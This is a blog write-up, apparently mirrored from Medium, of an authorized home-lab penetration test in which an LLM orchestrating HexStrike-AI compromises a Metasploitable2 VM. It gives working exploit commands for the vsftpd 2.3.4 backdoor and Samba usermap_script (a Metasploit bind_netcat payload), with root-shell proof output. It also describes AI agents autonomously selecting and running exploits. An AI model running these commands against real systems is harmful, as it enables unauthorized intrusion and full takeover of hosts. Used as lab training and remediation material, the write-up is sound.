Skip to main content

HexStrike+OpenAI Codex. AI-Driven Exploitation of Metasploitable.

Cover image

Article Metadata

Ecosystem Fit

This page mirrors the original Medium article into the 1200km.com Docusaurus ecosystem. The original article flow, images, screenshots, infographics, and technical blocks are preserved from the export.

How I Used an LLM-Orchestrated Toolchain to Enumerate and Exploit a Deliberately Vulnerable Host (With Real Proofs)

Article image

Introduction

AI-assisted penetration testing is no longer a concept — it is operational reality.

In this article, I walk through areal, authorizedpenetration test against my own lab host runningMetasploitable2. I used an LLM-driven workflow (Codex CLI) orchestrating tool execution throughHexStrike-AIto perform:

  • network discovery

  • enumeration and service fingerprinting

  • exploit selection and execution

  • proof collection (root-level command output)

This was not a simulation.

Real tools were executed. Real vulnerabilities were validated. And the target was compromised withunauthenticated root access— twice — via two independent attack paths.

Core Guides and Setup

HexStrike on Kali Linux 2025.4: A Comprehensive Guide

  • Focus: Initial setup and overview of the AI-powered offensive security framework.

HexStrike-AI: A Force Multiplier for Red Teams — and a Dangerous Shift in the Threat Landscape

  • Focus: Analysis of AI-orchestrated pentesting and its implications.

HexStrike MCP Orchestration with Ollama: Ubuntu Host, Kali VM, SSH Bridging, and Performance…

  • Focus: Technical architecture using Model Context Protocol (MCP) and local LLMs.

Practical Applications & Lab Comparisons

HexStrike + Gemini vs. HackerAI: “Ops Copilot” vs. “Chatbot with Tools”

  • Focus: Practical lab comparison of orchestration quality between different AI security tools.

AI-Driven Pentesting at Home: Using HexStrike-AI for Full Network Discovery and Exploitation

  • Focus: Step-by-step home lab application for network enumeration.

Specific Tooling & Technique Guides

What Is HexStrike-AI?

HexStrike-AI is not “another scanner.”

It is an orchestration layer that lets an LLM:

  • decide what security tools to run

  • execute them locally (or via SSH/MCP)

  • interpret outputs

  • adapt strategy dynamically (timeouts, missing tools, privilege constraints)

  • optionally run controlled exploitation with PoC evidence

In short:

The AI plans. HexStrike executes. Kali delivers the tools.

Test Scope & Authorization

This assessment was conducted under explicit authorization.

Scope

  • Target:172.16.163.129

  • **Environment:**private home lab (Metasploitable2 VM)

  • **Attacker:**Kali Linux environment with Codex CLI + HexStrike MCP

Article image

The Prompt That Started Everything

This is the “pattern” that makes LLM-driven pentesting actually work: you must demandexecution + evidence.

Example prompt structure (adapt it to your CLI):

Use the MCP server
"hexstrike"
: Authorized pentest of
172.16
.163
.129
Full service discovery
Enumerate versions
Identify
vulnerabilities

(by severity)
Exploit critical findings
Provide
proofs

(command output)

Key lesson: If you want HexStrike to run tools, explicitly require tool execution and proof artifacts.

Article image

Phase 1: Reachability and Discovery

The first attempt targeted a wrong IP (172.16.59.129) and resulted in “host seems down.”

After correcting to:

  • 172.16.163.129

The host responded immediately.

A fast top-ports discovery scan confirmed the target was up and exposed a broad attack surface.

Phase 2: Enumeration & Service Fingerprinting

Because the environment had constraints (root privileges not always available, tool timeouts), the workflow adapted:

  • switched from SYN scan (-sS) to TCP connect (-sT)

  • used bounded host timeouts

  • reduced version intensity when needed

Confirmed exposed services (high-level)

The target exposed multiple legacy services typical of Metasploitable2:

  • FTP (21)

  • SSH (22)

  • Telnet (23)

  • SMTP (25)

  • DNS (53)

  • HTTP (80)

  • RPCbind (111)

  • SMB (139/445)

  • rlogin/rsh (513/514)

  • NFS (2049)

  • FTP alt (2121)

  • MySQL (3306)

  • PostgreSQL (5432)

  • VNC (5900)

  • X11 (6000)

  • AJP (8009)

Article image

Host identity confirmation

The HTTP landing page provided a definitive marker:

curl -s http://172.16.163.129:80 |
head
-n 5

Output included:

  • <title>Metasploitable2 - Linux</title>

At this point, the test shifted from “general assessment” to “known vulnerable image validation” — meaning we should expect multiple published RCE paths.

Phase 3: Vulnerability Discovery (What Stood Out Immediately)

Two services were immediate critical flags due toknown RCE historyin this lab image:

  • vsftpd 2.3.4(commonly backdoored in lab builds)

  • Samba 3.0.20(classic usermap_script RCE path)

Rather than listing every CVE possible for every old service, the workflow focused on:

  • vulnerabilities withdirect, reliable exploitability

  • minimal risk of destabilizing the host

  • clear PoC output validation

Article image

Phase 4: Exploitation (With Proofs)

Article image

Exploit #1 — vsftpd 2.3.4 backdoor (CVE-2011–2523) → Root

Why it worked

In the Metasploitable2 build, vsftpd is intentionally vulnerable. A crafted username containing:)triggers a backdoor listener (commonly on TCP/6200).

Step A — Trigger the backdoor

(printf
"USER test:)
\r
\n
PASS test
\r
\n
QUIT
\r
\n
"
; sleep
1
)
|
nc
-
nv
-
w
2

172.16
.
163.129

21

This confirmed:

  • FTP reachable

  • banner:220 (vsFTPd 2.3.4)

Step B — Connect to backdoor shell and capture proof

printf
"id
\n
uname -a
\n
whoami
\n
pwd
\n
"

|
nc
-
nv
-
w
3

172.16
.
163.129

6200

Proof (captured output):

uid
=
0
(
root
)
gid
=
0
(
root
)
Linux metasploitable
2.6
.
24
-
16
-server
#1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root
/

**Impact:**Unauthenticated Remote Code Execution →root.

No persistence was deployed. No further actions were taken.

Exploit #2 — Samba usermap_script (CVE-2007–2447) → Root bind shell

Why it worked

Samba 3.0.20 has a well-known remote command execution vulnerability via the username map script feature. Metasploit automates exploitation.

Tooling nuance: why a bind shell was used

The first Metasploit run produced unstable command shell behavior (sessions closing quickly and command execution differences between session types). The workflow pivoted to abind shell payload, which is often more reliable in constrained environments.

Step A — Launch exploit with bind netcat payload (binds on port 4446)

msfconsole -q -x
'use exploit/multi/samba/usermap_script; \
set
RHOSTS
172.16
.
163.129
;
set
RPORT
139
; \
set
payload cmd/unix/bind_netcat; \
set
LPORT
4446
;
set
DisablePayloadHandler
true
; \
exploit -z;
exit
-y
'

Step B — Connect to bind shell and capture proof

printf
"id
\n
uname -a
\n
whoami
\n
pwd
\n
"

|
nc
-
nv
-
w
3

172.16
.
163.129

4446

Proof (captured output):

uid
=
0
(
root
)
gid
=
0
(
root
)
Linux metasploitable
2.6
.
24
-
16
-server
#1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root
/

**Impact:**Unauthenticated Remote Code Execution →root.

Article image

Final Results Summary

What was validated

  • Broad service exposure consistent with Metasploitable2

  • Two separate unauthenticated root compromises, each independently sufficient for full takeover:

  • vsftpd backdoor (TCP/6200)

  • Samba usermap_script (bind shell on TCP/4446)

Article image

What was intentionally not done

  • No persistence / backdoors

  • No credential harvesting

  • No data collection beyond proof commands

  • No lateral movement testing

This kept the test strictly PoC-focused.

Remediation Recommendations (Real-World Perspective)

Metasploitable2 is intentionally insecure. In real systems, the remediation playbook is clear.

Critical

  • Remove backdoored/vulnerable services immediately

  • Never expose training VMs on networks shared with real assets

  • Enforce segmentation (lab VLAN / host-only networks)

High

  • Remove legacy cleartext and trust-based services:

  • Telnet

  • rsh/rlogin

  • VNC / X11 (unless strictly controlled)

  • Restrict SMB exposure and enforce modern versions/configs

Medium

  • Disable obsolete crypto (SSLv2) and weak ciphers

  • Remove version banners and harden HTTP stack

  • Restrict AJP to localhost/internal networks only

Low

  • Reduce attack surface: firewall by default, allowlist by source

  • Continuous inventory and exposure monitoring

Why This Matters

This test highlights the real value of AI in offensive workflows:

AI did not “replace” pentesting skills. Itamplifiedthem.

The LLM-driven workflow:

  • selected practical next steps

  • adapted to missing tools and privilege constraints

  • pivoted when sessions were unstable

  • still produced clean PoC artifacts

The operator still matters — but themental overhead drops sharply.

Final Thoughts

HexStrike-AI is not a toy. Used correctly, it behaves like a junior pentester with perfect memory and infinite patience — executing exactly what you instruct and iterating until it gets results.